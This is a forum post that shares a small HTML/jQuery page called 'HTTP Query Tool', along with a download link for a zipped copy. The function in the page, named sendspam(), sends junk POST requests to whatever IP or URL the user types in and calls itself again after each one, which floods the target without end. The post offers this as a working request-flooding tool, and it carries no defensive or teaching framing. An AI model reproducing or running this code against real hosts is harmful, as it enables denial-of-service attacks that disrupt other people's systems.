Install Brave Browser for 30 days and earn money - http://bit.ly/_brave_browser
SearchSearch CalendarCalendar GalleryGalleryAuction-PortalAuctionsMembersMembers StatisticsStats
get your RSS-Feed
Language/Sprache:  Admin  
 Login: ChatChat (0) new User-MapUser-Mapsend Passwordsend Password RegisterRegister

Forum Overview » Beta Cyberlord » JS » jQuery http request bot/HTTP Query Tool
Pages: (1) [1] »
Registration necessaryRegistration necessary
jQuery http request bot/HTTP Query Tool
privateloaderno Access no Access first Post cannot be deleted -> delete the whole Topic 
Group: User
Level:


Posts: 246
Joined: 9/20/2020
IP-Address: saved
offline



<html>
<head>
<title>HTTP Query Tool</title>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
</head>
<body>
<br><br><br>
<center>
<h3>Fill the IP...</h3>
<table>
<tr><td> IP : </td><td><input type="text" id="yourname" placeholder="http://127.0.0.1"></td></tr>
<tr><td></td><td><input type="submit" name="send" value="Send!" style="width: 100%" onclick="sendspam()">
<script>
function sendspam() {
var yourname = document.getElementById("yourname").value;
if (yourname == "") {alert('Type something!');return false;}
var dataString = "crap";
$.ajax({type: "POST", url: ""+yourname+"", data: dataString, cache: false,});
sendspam();
}
</script>


Download: (HTTP Query Tool zipped)
https://uploadrar.com/cyjk8uhjziec


9/23/2020 7:27:19 PM   
Registration necessaryRegistration necessary
Pages: (1) [1] »
all Times are GMT +1:00
Thread-Info
AccessModerators
Reading: all
Writing: all
Group: general
none
Forum Overview » Beta Cyberlord » JS » jQuery http request bot/HTTP Query Tool
Install Brave Browser for 30 days and earn money - http://bit.ly/_brave_browser

.: Script-Time: 0.172 || SQL-Queries: 6 || Active-Users: 4,135 :.
Powered by ASP-FastBoard HE v0.8, hosted by cyberlord.at